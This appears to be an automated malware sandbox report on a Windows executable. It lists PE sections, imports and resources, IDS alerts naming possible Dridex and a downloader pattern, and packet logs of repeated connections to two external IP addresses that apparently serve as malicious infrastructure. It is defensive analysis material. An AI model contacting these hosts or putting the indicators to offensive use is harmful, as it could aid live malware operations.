                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          CODE0x10000x9d300x9e00c3bd95c4b1a8e5199981e0d9b45fd18cFalse0.6052709651898734data6.631765876950794IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          DATA0xb0000x2500x4001ee71d84f1c77af85f1f5c278f880572False0.306640625data2.751820662285145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          BSS0xc0000xe8c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x100000x8c40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x110000x2c000x2c008c81afd5cbdc70425e7ea3c4e3d7b3cbFalse0.32572798295454547data4.493196889564934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                          RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                          RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                          RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                          RT_STRING0x125740x2f2data0.35543766578249336
                                                                                          RT_STRING0x128680x30cdata0.3871794871794872
                                                                                          RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                          RT_STRING0x12e440x68data0.75
                                                                                          RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                          RT_STRING0x12f600xaedata0.5344827586206896
                                                                                          RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                                          RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                          RT_VERSION0x1307c0x4f4dataEnglishUnited States0.2610410094637224
                                                                                          RT_MANIFEST0x135700x5a4XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.42590027700831024
                                                                                          DLLImport
                                                                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                          user32.dllMessageBoxA
                                                                                          oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                                          kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                          user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                          comctl32.dllInitCommonControls
                                                                                          advapi32.dllAdjustTokenPrivileges
                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          DutchNetherlands
                                                                                          EnglishUnited States
                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-12-18T21:09:00.658716+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849708188.119.66.185443TCP
                                                                                          2024-12-18T21:09:01.486334+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849708188.119.66.185443TCP
                                                                                          2024-12-18T21:09:06.384113+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849711188.119.66.185443TCP
                                                                                          2024-12-18T21:09:07.101198+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849711188.119.66.185443TCP
                                                                                          2024-12-18T21:09:08.727603+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849712188.119.66.185443TCP
                                                                                          2024-12-18T21:09:09.462001+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849712188.119.66.185443TCP
                                                                                          2024-12-18T21:09:11.182430+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849714188.119.66.185443TCP
                                                                                          2024-12-18T21:09:11.888662+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849714188.119.66.185443TCP
                                                                                          2024-12-18T21:09:13.655094+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849715188.119.66.185443TCP
                                                                                          2024-12-18T21:09:14.348609+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849715188.119.66.185443TCP
                                                                                          2024-12-18T21:09:15.958266+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849716188.119.66.185443TCP
                                                                                          2024-12-18T21:09:16.668888+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849716188.119.66.185443TCP
                                                                                          2024-12-18T21:09:18.459472+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849718188.119.66.185443TCP
                                                                                          2024-12-18T21:09:19.162482+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849718188.119.66.185443TCP
                                                                                          2024-12-18T21:09:20.767558+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849724188.119.66.185443TCP
                                                                                          2024-12-18T21:09:21.528430+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849724188.119.66.185443TCP
                                                                                          2024-12-18T21:09:23.091280+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849730188.119.66.185443TCP
                                                                                          2024-12-18T21:09:23.773716+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849730188.119.66.185443TCP
                                                                                          2024-12-18T21:09:25.363360+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849736188.119.66.185443TCP
                                                                                          2024-12-18T21:09:26.062372+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849736188.119.66.185443TCP
                                                                                          2024-12-18T21:09:27.664970+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849742188.119.66.185443TCP
                                                                                          2024-12-18T21:09:28.352868+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849742188.119.66.185443TCP
                                                                                          2024-12-18T21:09:29.948095+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849748188.119.66.185443TCP
                                                                                          2024-12-18T21:09:30.664229+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849748188.119.66.185443TCP
                                                                                          2024-12-18T21:09:32.225728+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849753188.119.66.185443TCP
                                                                                          2024-12-18T21:09:32.911095+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849753188.119.66.185443TCP
                                                                                          2024-12-18T21:09:34.496093+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849759188.119.66.185443TCP
                                                                                          2024-12-18T21:09:35.212252+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849759188.119.66.185443TCP
                                                                                          2024-12-18T21:09:36.805991+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849765188.119.66.185443TCP
                                                                                          2024-12-18T21:09:37.512182+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849765188.119.66.185443TCP
                                                                                          2024-12-18T21:09:39.297849+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849771188.119.66.185443TCP
                                                                                          2024-12-18T21:09:40.000817+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849771188.119.66.185443TCP
                                                                                          2024-12-18T21:09:41.570111+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849778188.119.66.185443TCP
                                                                                          2024-12-18T21:09:42.249515+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849778188.119.66.185443TCP
                                                                                          2024-12-18T21:09:43.826321+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849784188.119.66.185443TCP
                                                                                          2024-12-18T21:09:44.511936+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849784188.119.66.185443TCP
                                                                                          2024-12-18T21:09:46.121370+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849790188.119.66.185443TCP
                                                                                          2024-12-18T21:09:46.815980+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849790188.119.66.185443TCP
                                                                                          2024-12-18T21:09:48.410246+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849796188.119.66.185443TCP
                                                                                          2024-12-18T21:09:49.109158+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849796188.119.66.185443TCP
                                                                                          2024-12-18T21:09:50.869446+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849799188.119.66.185443TCP
                                                                                          2024-12-18T21:09:51.559680+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849799188.119.66.185443TCP
                                                                                          2024-12-18T21:09:53.153009+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849807188.119.66.185443TCP
                                                                                          2024-12-18T21:09:53.859056+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849807188.119.66.185443TCP
                                                                                          2024-12-18T21:09:55.624214+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849814188.119.66.185443TCP
                                                                                          2024-12-18T21:09:56.304733+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849814188.119.66.185443TCP
                                                                                          2024-12-18T21:09:57.893305+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849820188.119.66.185443TCP
                                                                                          2024-12-18T21:09:58.595378+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849820188.119.66.185443TCP
                                                                                          2024-12-18T21:10:00.351530+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849825188.119.66.185443TCP
                                                                                          2024-12-18T21:10:01.039673+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849825188.119.66.185443TCP
                                                                                          2024-12-18T21:10:02.934321+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849831188.119.66.185443TCP
                                                                                          2024-12-18T21:10:03.652200+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849831188.119.66.185443TCP
                                                                                          2024-12-18T21:10:05.249776+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849838188.119.66.185443TCP
                                                                                          2024-12-18T21:10:05.953618+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849838188.119.66.185443TCP
                                                                                          2024-12-18T21:10:07.733130+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.849845188.119.66.185443TCP
                                                                                          2024-12-18T21:10:08.478248+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849845188.119.66.185443TCP
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 18, 2024 21:08:58.944464922 CET49708443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:08:58.944533110 CET44349708188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:08:58.944710016 CET49708443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:08:59.002722025 CET49708443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:08:59.002763987 CET44349708188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:00.658649921 CET44349708188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:00.658715963 CET49708443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:00.845097065 CET49708443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:00.845158100 CET44349708188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:00.846152067 CET44349708188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:00.846231937 CET49708443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:00.858563900 CET49708443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:00.899363995 CET44349708188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:01.486447096 CET44349708188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:01.486593962 CET49708443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:01.486625910 CET44349708188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:01.486666918 CET44349708188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:01.486778975 CET49708443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:01.486778975 CET49708443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:01.542398930 CET49708443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:01.542443991 CET44349708188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:01.543565989 CET497102024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:01.663471937 CET20244971031.214.157.206192.168.2.8
                                                                                          Dec 18, 2024 21:09:01.663546085 CET497102024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:01.663671970 CET497102024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:01.783071041 CET20244971031.214.157.206192.168.2.8
                                                                                          Dec 18, 2024 21:09:01.783123016 CET497102024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:01.902862072 CET20244971031.214.157.206192.168.2.8
                                                                                          Dec 18, 2024 21:09:02.904292107 CET20244971031.214.157.206192.168.2.8
                                                                                          Dec 18, 2024 21:09:02.960208893 CET497102024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:04.915242910 CET49711443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:04.915282965 CET44349711188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:04.915364027 CET49711443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:04.915662050 CET49711443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:04.915678978 CET44349711188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:06.384016037 CET44349711188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:06.384113073 CET49711443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:06.384790897 CET49711443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:06.384812117 CET44349711188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:06.384972095 CET49711443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:06.384978056 CET44349711188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:07.101195097 CET44349711188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:07.101274967 CET44349711188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:07.101350069 CET49711443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:07.135396004 CET49711443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:07.135437012 CET44349711188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:07.276730061 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:07.276770115 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:07.276829958 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:07.277211905 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:07.277223110 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:08.727493048 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:08.727602959 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:08.728022099 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:08.728030920 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:08.728235960 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:08.728240967 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.462198019 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.462354898 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.462364912 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.462388039 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.462414026 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.462445974 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.462718010 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.462733030 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.463665009 CET497132024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:09.583230972 CET20244971331.214.157.206192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.583470106 CET497132024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:09.583556890 CET497132024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:09.583556890 CET497132024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:09.700648069 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.700684071 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.700809956 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.701431036 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.701456070 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.703255892 CET20244971331.214.157.206192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.749166965 CET20244971331.214.157.206192.168.2.8
                                                                                          Dec 18, 2024 21:09:10.556447029 CET20244971331.214.157.206192.168.2.8
                                                                                          Dec 18, 2024 21:09:10.556561947 CET497132024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:11.180046082 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:11.182430029 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:11.182858944 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:11.182868958 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:11.183105946 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:11.183110952 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:11.888695955 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:11.888778925 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:11.888823986 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:11.888885021 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:11.889350891 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:11.889369965 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:12.009166002 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:12.009213924 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:12.009361982 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:12.009845972 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:12.009864092 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:13.654992104 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:13.655093908 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:13.655545950 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:13.655556917 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:13.655714035 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:13.655719995 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:14.348725080 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:14.348901033 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:14.349057913 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:14.349265099 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:14.349282980 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:14.477689028 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:14.477735043 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:14.477966070 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:14.478197098 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:14.478219032 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:15.958192110 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:15.958266020 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:15.961941957 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:15.961951017 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:15.962127924 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:15.962145090 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.668905020 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.668967009 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.668987989 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.669022083 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.669028044 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.669059038 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.669059992 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.669096947 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.669347048 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.669362068 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.791330099 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.791363001 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.791428089 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.792073965 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.792087078 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:18.459223032 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:18.459471941 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:18.460066080 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:18.460074902 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:18.460443974 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:18.460449934 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:19.162508965 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:19.162635088 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:19.162643909 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:19.162682056 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:19.163424969 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:19.163444042 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:19.290716887 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:19.290756941 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:19.290838957 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:19.291215897 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:19.291237116 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:20.767446041 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:20.767558098 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:20.768038988 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:20.768050909 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:20.768233061 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:20.768238068 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:21.528378963 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:21.528460979 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:21.528462887 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:21.528510094 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:21.528656006 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:21.528675079 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:21.634684086 CET49730443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:21.634737015 CET44349730188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:21.634849072 CET49730443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:21.635196924 CET49730443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:21.635210991 CET44349730188.119.66.185192.168.2.8
